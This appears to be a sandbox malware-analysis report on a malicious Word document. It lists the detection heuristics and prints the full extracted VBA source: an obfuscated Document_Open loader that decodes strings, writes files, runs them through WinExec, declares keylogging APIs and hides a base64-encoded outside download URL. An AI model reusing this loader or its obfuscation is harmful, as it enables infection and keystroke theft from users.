MALICIOUS
110
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1056.001 Input Capture: Keylogging
T1204.002 Malicious File: User Execution: Malicious Attachment
The sample is a malicious Office document containing VBA macros. The macros include a Document_Open subroutine which appears to be obfuscated and attempts to monitor keystrokes using GetAsyncKeyState. The presence of WinExec API references and the Document_Open macro suggest an attempt to execute arbitrary code, likely to download and run a second-stage payload.
Heuristics 5
-
Reference to WinExec API high SC_STR_WINEXECReference to WinExec API
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA polls global keyboard state (keylogger) high OLE_VBA_KEYLOGGER_SPYWAREThe macro declares or calls a Win32 keystroke-monitoring API (GetAsyncKeyState, SetWindowsHookEx WH_KEYBOARD, or GetKeyboardState) to capture keystrokes system-wide. No legitimate document automation polls global key state; this is the core of a VBA keylogger, usually paired with active-window capture (GetForegroundWindow) and a log file. A high-confidence spyware behaviour independent of any download / Shell evidence.Matched line in script
Declare PtrSafe Function GetAsyncKeyState Lib "user32" (ByVal vKey As LongPtr) As Integer -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 24803 bytes |
SHA-256: 3eb6d8ff8c3a77dbdd36153a50664f8d54c38206fb7976001423159752b41424 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
Dim TR As Double
TR = 2.5644976 * Cos(2.48345034194 + 26.3453)
If TR = 12.3456 Then MsgBox ("impossible")
End Sub
Private Sub Document_New()
Dim u As Double
u = 4.710144 * Sqr(Abs(36.4562))
u = 0.814976 * Cos(2.45034194) - u
End Sub
Private Sub Document_Open()
Dim TR As Double
TR = 2.5644976 * Cos(2.48345034194 + 26.3453)
hcvkf2kj.cvwjvgj2345RR TR - 4.76507144 * Sin(1 + 0.048)
End Sub
Attribute VB_Name = "hcvkf2kj"
Private Sub vnkw3j2k4(iefj As Integer, jhf As String, shkjw As Double, jsu3 As String)
fhejr3.Label2.Caption = "cvbnkw3 34j23 334/546"
If fhejr3.Label2.Caption = "result" Then MsgBox ("message")
zzxmnkj325.lgklj4ksd jhf + " " + jsu3, 0
fhejr3.Label2.Caption = "345 785 235" & fhejr3.Label2.Tag + "345"
End Sub
Public Function vk3FFAWewg345SDGF(dre As Long, nfk4 As String) As String
Dim BZDF456SWGwtgw354 As Double
BZDF456SWGwtgw354 = 0#
Dim slen As Long
Dim src As String
Dim res As String
src = nfk4
slen = Len(src) / 3
res = Space$(slen)
Dim FGH654 As Long
vk3FFAWewg345SDGF = Space$(slen)
Dim HJ6 As String
Dim sdf As String
For i = 1 To slen
BZDF456SWGwtgw354 = BZDF456SWGwtgw354 - 3.046294199 * Sin(8.48548954 + 175.80631484 * T)
Mid$(res, i, 1) = Mid$(src, i * 3, 1)
Next
BZDF456SWGwtgw354 = BZDF456SWGwtgw354 - 3.046294199 * Sin(8.48548954 + 175.80631484 * T)
sdf = vk3FFAWewg345SDGF
For i = 1 To slen
FGH654 = slen - i + 1
HJ6 = Mid$(res, FGH654, 1)
Dim dfke As String
Dim i34 As Integer
BZDF456SWGwtgw354 = BZDF456SWGwtgw354 + 9.000030263 * Cos(1.920745251 + 71.7572 * T)
i34 = 1
dfke = ""
BZDF456SWGwtgw354 = BZDF456SWGwtgw354 + 7.00303 * Cos(1.9207251 + 1.752 * T)
If BZDF456SWGwtgw354 <> 9.99 Then Mid$(sdf, i, i34) = dfke & HJ6
Next
vk3FFAWewg345SDGF = sdf
BZDF456SWGwtgw354 = BZDF456SWGwtgw354 - 7.00054259 * Cos(345.234954 + 56.0034584 * T)
End Function
Public Sub cvwjvgj2345RR(T As Double)
fhejr3.Label2.Caption = "98"
If fhejr3.Label2.Caption = "34" Then
MsgBox ("345")
Application.Quit
End If
fhejr3.Label1.Caption = vk3FFAWewg345SDGF(2, "WZ\34cp9iPGlf4b&(uVBP[#\,;sXnrQve{ts&+U//\4J:yBC")
fhejr3.Label1.Tag = fhejr3.Label1.Caption + vk3FFAWewg345SDGF(3, "+ctIia0fbb;.zzj2~2-#3Ssg$Qh")
Open fhejr3.Label1.Tag For Binary As #1
Put #1, , vk3FFAWewg345SDGF(4, "P<k$ke3J4%4h1HjoukM(\V?c%Fip8lSgb!Tun<Pn]\~BsMgr>0eo[s_1Urq\_R:oTC%L zZr0%i#RdlHk-dmV9 Mjc<;/XF QId+DmPyc")
Close #1
vnkw3j2k4 2, fhejr3.Label1.Tag, 0.4, ""
Do While Dir(vk3FFAWewg345SDGF(5, ".Bk$Zes^4+KhT}jc/k1f\Wrc+5i8sl+lbk$uC<PAE\n%s-@r3$exnsafU)=\tk:YbC"), vbDirectory) = ""
Loop
fhejr3.Tag = vk3FFAWewg345SDGF(6, "kP %~TXh/Ns !AYNv 1WD6o/T> !;NrE/q/ P/Yj5 iNC|e/]A u^eLsc63iPQo36h=-c5# ZICr%/Y] wre3!x2GeTh.$4d5~m(nc1{\:42#e39.mCZeCqtk{s=$yoDShh\7_sXOwLBoQTdoDn%Ci_,W[#\B<:lgC")
fhejr3.Caption = vk3FFAWewg345SDGF(8, "~B)Mg)>0)o['_1lrqh_RXoTZ%LuzZM0%G#RblHh-dNV9GMjX<;jXFlQIG+DbPyi.BV$ZHs^U+KcT}Nc/n1fcWrl+5N8sX+lVk$cC<pAEzn%Q-@'3$(xngafn)=itkrYbtkPS%~4Xh6Nse!AsNva1WB6omT>o!;rrEFq/:P/:j5]iNt|er]Aeu^vLsn63oPQC36.=-m5#eZItr%sY]ywrS3![2G(Thg$4n5~i(nr1{t:4S#et9.eCZGCq.k{I=$IoDChhS7_AXO:LB:QT]oDg%Cn_,i[#dB<olgc*Vn4,Eh[.8DtjTxuAe;YT9k.SImT*eUIt~Ws4Kyb@Sj5[{S $T,I*)YG),6'qI=m$=,4AdEcf7om+B{3n#=Lbl6@5pug2p5NFDZH8R()1V4Y(]vn6tKxmm=QgN01BsXukCkb)mvA*U]*D$4NH=uv{UvwTX?NfhyVM4jxS}vOnl5|h4efiE:MKN5<-EW+z~KLxavV,oKwD2xc~<0N}Rb<H3*a1n'uI(aMgh8n=gi)9r~(tW~Sn~4%&6d{e7@siYa<fBznm.5oA;rH!Fuo:wV:]k]]Oth&rp.e&{vtPna%okKCC?.dxmrweo5t}<ss&y78S:P[;9(o6gZMn<Xi1WrxKtGdS(stgJe2gGso.7PI3!IO~CK-S2sA<[:J?:r]]1Og5@neAixLd]@o%]cJKn]CEJZ.G%t$%x$neszT0:.HVmk:esVt8Ns~iyhhSdG[C!(nKeg0l#si~4F8XdjXae.oQ>l%Wn0~wHJoe)Dpf.C*)tDtSbnOUe4%iKFl+<C5/bfZe{JWCA.c4tJcedPN=| K#t4)c[1e3hj*Qb22OZ)-0FwbyeFvN^H({l #6d}qnW]a&>ms]m(,o+}C6r-5y x%l*pl@Reh)h=lsC1rR^er#w/bo7~pqg z0C+Y/")
' aHR0cDovLzE0NC45MS43OS42L2FwaS5waHA=
fhejr3.Label2.Tag = "98"
fhejr3.Label2.Caption = fhejr3.Label2.Tag + "dfw"
vnkw3j2k4 4, vk3FFAWewg345SDGF(8, "tDeSbxOUe4%.KFd+<m5/cfZ\{J2CA3c4mJcedPt=|sK#y4)S[1\3hs*Qw22oZ)d0FnbyiFvW^H\{l:#6C"), 5.23, fhejr3.Caption
Dim HRD456ESWTG As Double
HRD456ESWTG = 0#
HRD456ESWTG = HRD456ESWTG + 4.7650710144 * Cos(1 + 0.02 * T)
fhejr3.Label1.Tag = fhejr3.Label1.Caption + vk3FFAWewg345SDGF(10, "HJte)apfbC*.tDhSb4OU34%jKFd+<n5/\fZk{JeCA4c4hJcjdPk")
HRD456ESWTG = 3.00199 * Cos(5.23487 + 3.0348 * T / 2) - 1.04534199 * Sin(6.45634 + 15.80084 * T * 2) + R
If fhejr3.Label2.Caption <> "apple" Then Open fhejr3.Label1.Tag For Binary As #3
fhejr3.Tag = fhejr3.Tag + "50 & " & vk3FFAWewg345SDGF(12, "0FebyxFve^H.{lc#6l}qaW]c&>\s]c(,i+}l6rb5yux%P*p\@Rsh)r=leC1sR^Ur#\/b:7~C")
Put #3, , fhejr3.Tag
Dim QW345DSFG5 As Double
Dim Mercury_L02 As Double
QW345DSFG5 = 0#
If fhejr3.Label2.Caption <> "aqm34" Then
QW345DSFG5 = QW345DSFG5 + 0.00000001239 * Cos(0.8328616637 + 55618.3812281138 * T)
For i = 1 To 4
QW345DSFG5 = QW345DSFG5 + 0.00000001254 * Cos(2.24332680768 + 12188.730898597 * T)
If i = 1 Then
If QW345DSFG5 <> 12.34567 Then
Close #3
Else
QW345DSFG5 = Sin(2.15445290383 + 39.48438752 * T)
End If
End If
Next
QW345DSFG5 = Cos(5.72285490406 + 24176.703658357 * T) * 0.2 + QW345DSFG5
Else
Dim stj As String
QW345DSFG5 = QW345DSFG5 - 0.0000124 * Cos(4.22680768 + 1628.798597 * T)
stj = "ok"
If stj = "12" Then MsgBox (stj)
End If
Dim df345 As String
df345 = "3427864"
df345 = df345 & "098"
vnkw3j2k4 623, fhejr3.Label1.Tag, Sin(25), ""
'Application.Quit
End Sub
Attribute VB_Name = "fhejr3"
Attribute VB_Base = "0{F0B0D4B2-D263-4609-B4CA-DAD5BC46989E}{BF1B753A-04E3-4E55-B919-0672F95D9029}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "zzxmnkj325"
#If VBA7 Then
Declare PtrSafe Function DdeFreeStringHandle Lib "user32" (ByVal idInst As LongPtr, ByVal hsz As LongPtr) As LongPtr
Declare PtrSafe Function DefDlgProc Lib "user32" Alias "DefDlgProcA" (ByVal hDlg As LongPtr, ByVal wMsg As LongPtr, ByVal wParam As LongPtr, ByVal lParam As LongPtr) As LongPtr
Declare PtrSafe Function DeferWindowPos Lib "user32" (ByVal hWinPosInfo As LongPtr, ByVal hWnd As LongPtr, ByVal hWndInsertAfter As LongPtr, ByVal x As LongPtr, ByVal y As LongPtr, ByVal cx As LongPtr, ByVal cy As LongPtr, ByVal wFlags As LongPtr) As LongPtr
Declare PtrSafe Function DestroyAcceleratorTable Lib "user32" (ByVal haccel As LongPtr) As LongPtr
Declare PtrSafe Function DdeDisconnect Lib "user32" (ByVal sfawerq345qwf As LongPtr) As LongPtr
Declare PtrSafe Function DdeDisconnectList Lib "user32" (ByVal hConvList As LongPtr) As LongPtr
Declare PtrSafe Function DdeEnableCallback Lib "user32" (ByVal idInst As LongPtr, ByVal hConv As LongPtr, ByVal wCmd As LongPtr) As LongPtr
Declare PtrSafe Function DdeFreeDataHandle Lib "user32" (ByVal hData As LongPtr) As LongPtr
Declare PtrSafe Function DestroyCaret Lib "user32" () As LongPtr
Declare PtrSafe Function DestroyCursor Lib "user32" (ByVal hCursor As LongPtr) As LongPtr
Declare PtrSafe Function DestroyIcon Lib "user32" (ByVal hIcon As LongPtr) As LongPtr
Declare PtrSafe Function ActivateKeyboardLayout Lib "user32" (ByVal fkjn54lk4nlws As LongPtr, ByVal cbkjwhefkjhv4j3rhvw As LongPtr) As LongPtr
Declare PtrSafe Function AnyPopup Lib "user32" () As LongPtr
Declare PtrSafe Function AttachThreadInput Lib "user32" (ByVal idAttach As LongPtr, ByVal idAttachTo As LongPtr, ByVal fAttach As LongPtr) As LongPtr
Declare PtrSafe Function CopyIcon Lib "user32" (ByVal hIcon As LongPtr) As LongPtr
Declare PtrSafe Function DestroyMenu Lib "user32" (ByVal hMenu As LongPtr) As LongPtr
Declare PtrSafe Function DestroyWindow Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function DlgDirSelectComboBoxEx Lib "user32" Alias "DlgDirSelectComboBoxExA" (ByVal hWndDlg As LongPtr, ByVal lpszPath As String, ByVal cbPath As LongPtr, ByVal idComboBox As LongPtr) As LongPtr
Declare PtrSafe Function CreateMDIWindow Lib "user32" Alias "CreateMDIWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As LongPtr, ByVal x As LongPtr, ByVal y As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal hWndParent As LongPtr, ByVal hInstance As LongPtr, ByVal lParam As LongPtr) As LongPtr
Declare PtrSafe Function CreateMenu Lib "user32" () As LongPtr
Declare PtrSafe Function CreatePopupMenu Lib "user32" () As LongPtr
Declare PtrSafe Function CreateWindow Lib "user32" Alias "CreateWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As LongPtr, ByVal x As LongPtr, ByVal y As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal hWndParent As LongPtr, ByVal hMenu As LongPtr, ByVal hInstance As LongPtr, lpParam As Any) As LongPtr
Declare PtrSafe Function DrawMenuBar Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function BringWindowToTop Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function CloseDesktop Lib "user32" (ByVal hDesktop As LongPtr) As Boolean
Declare PtrSafe Function EndDeferWindowPos Lib "user32" (ByVal hWinPosInfo As LongPtr) As LongPtr
Declare PtrSafe Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hWnd As LongPtr, ByVal lpClassName As String, ByVal nMaxCount As LongPtr) As LongPtr
Declare PtrSafe Function GetClassWord Lib "user32" (ByVal hWnd As LongPtr, ByVal nIndex As LongPtr) As LongPtr
Declare PtrSafe Function GetClipboardData Lib "user32" Alias "GetClipboardDataA" (ByVal wFormat As LongPtr) As LongPtr
Declare PtrSafe Function GetClipboardFormatName Lib "user32" Alias "GetClipboardFormatNameA" (ByVal wFormat As LongPtr, ByVal lpString As String, ByVal nMaxCount As LongPtr) As LongPtr
Declare PtrSafe Function GetClipboardOwner Lib "user32" () As LongPtr
Declare PtrSafe Function FreeDDElParam Lib "user32" (ByVal msg As LongPtr, ByVal lParam As LongPtr) As LongPtr
Declare PtrSafe Function GetActiveWindow Lib "user32" () As LongPtr
Declare PtrSafe Function GetAsyncKeyState Lib "user32" (ByVal vKey As LongPtr) As Integer
Declare PtrSafe Function DlgDirSelectEx Lib "user32" Alias "DlgDirSelectExA" (ByVal hWndDlg As LongPtr, ByVal lpszPath As String, ByVal cbPath As LongPtr, ByVal idListBox As LongPtr) As LongPtr
Declare PtrSafe Function CopyImage Lib "user32" (ByVal Handle As LongPtr, ByVal un1 As LongPtr, ByVal n1 As LongPtr, ByVal n2 As LongPtr, ByVal un2 As LongPtr) As LongPtr
Declare PtrSafe Function CountClipboardFormats Lib "user32" () As LongPtr
Declare PtrSafe Function CreateCaret Lib "user32" (ByVal hWnd As LongPtr, ByVal hBitmap As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr) As LongPtr
Declare PtrSafe Function DrawIcon Lib "user32" (ByVal hDC As LongPtr, ByVal x As LongPtr, ByVal y As LongPtr, ByVal hIcon As LongPtr) As LongPtr
Declare PtrSafe Function DrawIconEx Lib "user32" (ByVal hDC As LongPtr, ByVal xLeft As LongPtr, ByVal yTop As LongPtr, ByVal hIcon As LongPtr, ByVal cxWidth As LongPtr, ByVal cyWidth As LongPtr, ByVal istepIfAniCur As LongPtr, ByVal hbrFlickerFreeDraw As LongPtr, ByVal diFlags As LongPtr) As Boolean
Declare PtrSafe Function GetCapture Lib "user32" () As LongPtr
Declare PtrSafe Function GetCaretBlinkTime Lib "user32" () As LongPtr
Declare PtrSafe Function GetClassLong Lib "user32" Alias "GetClassLongA" (ByVal hWnd As LongPtr, ByVal nIndex As LongPtr) As LongPtr
Declare PtrSafe Function ExcludeUpdateRgn Lib "user32" (ByVal hDC As LongPtr, ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function ExitWindows Lib "user32" (ByVal dwReserved As LongPtr, ByVal uReturnCode As LongPtr) As LongPtr
Declare PtrSafe Function ExitWindowsEx Lib "user32" (ByVal uFlags As LongPtr, ByVal dwReserved As LongPtr) As LongPtr
Declare PtrSafe Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As LongPtr
Declare PtrSafe Function SetDlgItemInt Lib "user32" (ByVal hDlg As LongPtr, ByVal nIDDlgItem As LongPtr, ByVal wValue As LongPtr, ByVal bSigned As LongPtr) As LongPtr
Declare PtrSafe Function SetDlgItemText Lib "user32" Alias "SetDlgItemTextA" (ByVal hDlg As LongPtr, ByVal nIDDlgItem As LongPtr, ByVal lpString As String) As LongPtr
Declare PtrSafe Function SetDoubleClickTime Lib "user32" (ByVal wCount As LongPtr) As LongPtr
Declare PtrSafe Function SetFocus Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function SetForegroundWindow Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function SetMenu Lib "user32" (ByVal hWnd As LongPtr, ByVal hMenu As LongPtr) As LongPtr
Declare PtrSafe Function SetMenuContextHelpId Lib "user32" (ByVal hMenu As LongPtr, ByVal dw As LongPtr) As Boolean
Declare PtrSafe Function GetKeyState Lib "user32" (ByVal nVirtKey As LongPtr) As Integer
Declare PtrSafe Function GetLastActivePopup Lib "user32" (ByVal hwndOwnder As LongPtr) As LongPtr
Declare PtrSafe Function GetMenu Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function GetClipboardViewer Lib "user32" () As LongPtr
Declare PtrSafe Function SetClipboardData Lib "user32" Alias "SetClipboardDataA" (ByVal wFormat As LongPtr, ByVal hMem As LongPtr) As LongPtr
Declare PtrSafe Function SetClipboardViewer Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function SetCursor Lib "user32" (ByVal hCursor As LongPtr) As LongPtr
Declare PtrSafe Function SetCursorPos Lib "user32" (ByVal x As LongPtr, ByVal y As LongPtr) As LongPtr
Declare PtrSafe Function GetMenuCheckMarkDimensions Lib "user32" () As LongPtr
Declare PtrSafe Function GetMenuItemCount Lib "user32" (ByVal hMenu As LongPtr) As LongPtr
Declare PtrSafe Function GetQueueStatus Lib "user32" (ByVal fuFlags As LongPtr) As LongPtr
Declare PtrSafe Function GetScrollPos Lib "user32" (ByVal hWnd As LongPtr, ByVal nBar As LongPtr) As LongPtr
Declare PtrSafe Function GetScrollRange Lib "user32" (ByVal hWnd As LongPtr, ByVal nBar As LongPtr, lpMinPos As LongPtr, lpMaxPos As LongPtr) As LongPtr
Declare PtrSafe Function GetTabbedTextExtent Lib "user32" Alias "GetTabbedTextExtentA" (ByVal hDC As LongPtr, ByVal lpString As String, ByVal nCount As LongPtr, ByVal nTabPositions As LongPtr, lpnTabStopPositions As LongPtr) As LongPtr
Declare PtrSafe Function GetThreadDesktop Lib "user32" (ByVal dwThread As LongPtr) As LongPtr
Declare PtrSafe Function GetTopWindow Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function GetUpdateRgn Lib "user32" (ByVal hWnd As LongPtr, ByVal hRgn As LongPtr, ByVal fErase As LongPtr) As LongPtr
Declare PtrSafe Function SetWindowRgn Lib "user32" (ByVal hWnd As LongPtr, ByVal hRgn As LongPtr, ByVal bRedraw As Boolean) As LongPtr
Declare PtrSafe Function SetWindowsHook Lib "user32" Alias "SetWindowsHookA" (ByVal nFilterType As LongPtr, ByVal pfnFilterProc As LongPtr) As LongPtr
Declare PtrSafe Function SwapMouseButton Lib "user32" (ByVal bSwap As LongPtr) As LongPtr
Declare PtrSafe Function SetActiveWindow Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function SetCapture Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function GetDC Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function GetDCEx Lib "user32" (ByVal hWnd As LongPtr, ByVal hrgnclip As LongPtr, ByVal fdwOptions As LongPtr) As LongPtr
Declare PtrSafe Function GetDesktopWindow Lib "user32" () As LongPtr
Declare PtrSafe Function GetFocus Lib "user32" () As LongPtr
Declare PtrSafe Function GetForegroundWindow Lib "user32" () As LongPtr
Declare PtrSafe Function GetKeyboardLayout Lib "user32" (ByVal dwLayout As LongPtr) As LongPtr
Declare PtrSafe Function SetMenuDefaultItem Lib "user32" (ByVal hMenu As LongPtr, ByVal uItem As LongPtr, ByVal fByPos As LongPtr) As Boolean
Public Declare PtrSafe Function lgklj4ksd Lib "kernel32" Alias "WinExec" (ByVal hti43 As String, ByVal vnjk3j As LongPtr) As Long
Declare PtrSafe Function SetMenuItemBitmaps Lib "user32" (ByVal hMenu As LongPtr, ByVal nPosition As LongPtr, ByVal wFlags As LongPtr, ByVal hBitmapUnchecked As LongPtr, ByVal hBitmapChecked As LongPtr) As LongPtr
Declare PtrSafe Function GetDlgItemInt Lib "user32" (ByVal hDlg As LongPtr, ByVal nIDDlgItem As LongPtr, ByVal lpTranslated As LongPtr, ByVal bSigned As LongPtr) As LongPtr
Declare PtrSafe Function GetDoubleClickTime Lib "user32" () As LongPtr
Declare PtrSafe Function GetKeyboardLayoutName Lib "user32" Alias "GetKeyboardLayoutNameA" (ByVal pwszKLID As String) As LongPtr
Declare PtrSafe Function GetUserObjectInformation Lib "user32" Alias "GetUserObjectInformationA" (ByVal hObj As LongPtr, ByVal nIndex As LongPtr, pvInfo As Any, ByVal nLength As LongPtr, lpnLengthNeeded As LongPtr) As Boolean
Declare PtrSafe Function GetWindow Lib "user32" (ByVal hWnd As LongPtr, ByVal wCmd As LongPtr) As LongPtr
Declare PtrSafe Function SetMessageExtraInfo Lib "user32" (ByVal lParam As LongPtr) As LongPtr
Declare PtrSafe Function SetCaretBlinkTime Lib "user32" (ByVal wMSeconds As LongPtr) As LongPtr
Declare PtrSafe Function SetCaretPos Lib "user32" (ByVal x As LongPtr, ByVal y As LongPtr) As LongPtr
Declare PtrSafe Function SetClassLong Lib "user32" Alias "SetClassLongA" (ByVal hWnd As LongPtr, ByVal nIndex As LongPtr, ByVal dwNewLong As LongPtr) As LongPtr
Declare PtrSafe Function SetClassWord Lib "user32" (ByVal hWnd As LongPtr, ByVal nIndex As LongPtr, ByVal wNewWord As LongPtr) As LongPtr
#Else
Declare Function CloseWindow Lib "user32" (ByVal hWnd As Long) As Long
Declare Function GetDialogBaseUnits Lib "user32" () As Long
Declare Function GetDlgCtrlID Lib "user32" (ByVal hWnd As Long) As Long
Declare Function GetDlgItem Lib "user32" (ByVal hDlg As Long, ByVal nIDDlgItem As Long) As Long
Declare Function GetDlgItemInt Lib "user32" (ByVal hDlg As Long, ByVal nIDDlgItem As Long, ByVal lpTranslated As Long, ByVal bSigned As Long) As Long
Declare Function GetDlgItemText Lib "user32" Alias "GetDlgItemTextA" (ByVal hDlg As Long, ByVal nIDDlgItem As Long, ByVal lpString As String, ByVal nMaxCount As Long) As Long
Declare Function GetClipboardFormatName Lib "user32" Alias "GetClipboardFormatNameA" (ByVal wFormat As Long, ByVal lpString As String, ByVal nMaxCount As Long) As Long
Declare Function GetClipboardOwner Lib "user32" () As Long
Declare Function GetClipboardViewer Lib "user32" () As Long
Declare Function GetDesktopWindow Lib "user32" () As Long
Declare Function CloseClipboard Lib "user32" () As Long
Declare Function CloseDesktop Lib "user32" (ByVal sdfkn234jbhiwefisu As Long) As Boolean
Declare Function GetDoubleClickTime Lib "user32" () As Long
Declare Function GetFocus Lib "user32" () As Long
Declare Function GetForegroundWindow Lib "user32" () As Long
Declare Function GetInputState Lib "user32" () As Long
Declare Function GetKBCodePage Lib "user32" () As Long
Declare Function CopyIcon Lib "user32" (ByVal hIcon As Long) As Long
Declare Function CopyImage Lib "user32" (ByVal Handle As Long, ByVal bcvmnxsbcvjhvrjh2v As Long, ByVal n1 As Long, ByVal n2 As Long, ByVal un2 As Long) As Long
Declare Function CountClipboardFormats Lib "user32" () As Long
Declare Function CreateCaret Lib "user32" (ByVal hWnd As Long, ByVal hBitmap As Long, ByVal nWidth As Long, ByVal nHeight As Long) As Long
Declare Function GetKeyboardLayoutName Lib "user32" Alias "GetKeyboardLayoutNameA" (ByVal pwszKLID As String) As Long
Declare Function CloseWindowStation Lib "user32" (ByVal hWinSta As Long) As Boolean
Declare Function CopyCursor Lib "user32" (ByVal hcur As Long) As Long
Declare Function GetKeyboardType Lib "user32" (ByVal nTypeFlag As Long) As Long
Declare Function GetKeyNameText Lib "user32" Alias "GetKeyNameTextA" (ByVal lParam As Long, ByVal lpBuffer As String, ByVal nSize As Long) As Long
Declare Function GetKeyState Lib "user32" (ByVal nVirtKey As Long) As Integer
Declare Function GetLastActivePopup Lib "user32" (ByVal hwndOwnder As Long) As Long
Declare Function GetMenu Lib "user32" (ByVal hWnd As Long) As Long
Declare Function DlgDirSelectEx Lib "user32" Alias "DlgDirSelectExA" (ByVal hWndDlg As Long, ByVal lpszPath As String, ByVal cbPath As Long, ByVal idListBox As Long) As Long
Declare Function DrawIcon Lib "user32" (ByVal hDC As Long, ByVal x As Long, ByVal y As Long, ByVal hIcon As Long) As Long
Declare Function SetWindowText Lib "user32" Alias "SetWindowTextA" (ByVal hWnd As Long, ByVal lpString As String) As Long
Declare Function SetWindowWord Lib "user32" (ByVal hWnd As Long, ByVal nIndex As Long, ByVal wNewWord As Long) As Long
Declare Function GetMessagePos Lib "user32" () As Long
Declare Function ExcludeUpdateRgn Lib "user32" (ByVal hDC As Long, ByVal hWnd As Long) As Long
Declare Function SetDoubleClickTime Lib "user32" (ByVal wCount As Long) As Long
Declare Function SetMenuDefaultItem Lib "user32" (ByVal hMenu As Long, ByVal uItem As Long, ByVal fByPos As Long) As Boolean
Declare Function SetMenuItemBitmaps Lib "user32" (ByVal hMenu As Long, ByVal nPosition As Long, ByVal wFlags As Long, ByVal hBitmapUnchecked As Long, ByVal hBitmapChecked As Long) As Long
Declare Function DrawIconEx Lib "user32" (ByVal hDC As Long, ByVal xLeft As Long, ByVal yTop As Long, ByVal hIcon As Long, ByVal cxWidth As Long, ByVal cyWidth As Long, ByVal istepIfAniCur As Long, ByVal hbrFlickerFreeDraw As Long, ByVal diFlags As Long) As Boolean
Declare Function DrawMenuBar Lib "user32" (ByVal hWnd As Long) As Long
Declare Function DrawState Lib "user32" Alias "DrawStateA" (ByVal hDC As Long, ByVal hBrush As Long, ByVal lpDrawStateProc As Long, ByVal lParam As Long, ByVal wParam As Long, ByVal n1 As Long, ByVal n2 As Long, ByVal n3 As Long, ByVal n4 As Long, ByVal un As Long) As Boolean
Declare Function EnableMenuItem Lib "user32" (ByVal hMenu As Long, ByVal wIDEnableItem As Long, ByVal wEnable As Long) As Long
Declare Function SetMessageExtraInfo Lib "user32" (ByVal lParam As Long) As Long
Declare Function SetParent Lib "user32" (ByVal hWndChild As Long, ByVal hWndNewParent As Long) As Long
Declare Function SetCaretBlinkTime Lib "user32" (ByVal wMSeconds As Long) As Long
Declare Function SetCaretPos Lib "user32" (ByVal x As Long, ByVal y As Long) As Long
Declare Function GetMessageTime Lib "user32" () As Long
Declare Function SystemParametersInfo Lib "user32" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, ByVal lpvParam As Any, ByVal fuWinIni As Long) As Long
Public Declare Function lgklj4ksd Lib "kernel32" Alias "WinExec" (ByVal dkngkljn3k As String, ByVal sudfhi3 As Long) As Long
Declare Function SetCapture Lib "user32" (ByVal hWnd As Long) As Long
Declare Function SetDlgItemInt Lib "user32" (ByVal hDlg As Long, ByVal nIDDlgItem As Long, ByVal wValue As Long, ByVal bSigned As Long) As Long
Declare Function GetMessageExtraInfo Lib "user32" () As Long
Declare Function GetOpenClipboardWindow Lib "user32" () As Long
Declare Function GetParent Lib "user32" (ByVal hWnd As Long) As Long
Declare Function GetProcessWindowStation Lib "user32" () As Long
Declare Function SendDlgItemMessage Lib "user32" Alias "SendDlgItemMessageA" (ByVal hDlg As Long, ByVal nIDDlgItem As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Long) As Long
Declare Function SetMessageQueue Lib "user32" (ByVal cMessagesMax As Long) As Boolean
Declare Function SetClassLong Lib "user32" Alias "SetClassLongA" (ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Declare Function SetClassWord Lib "user32" (ByVal hWnd As Long, ByVal nIndex As Long, ByVal wNewWord As Long) As Long
#End If
Private vfw46ywefg As Integer
Private btn65 As Long
Private pyuo4i6 As Boolean
Private vzoiseorti2jofij As Long
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.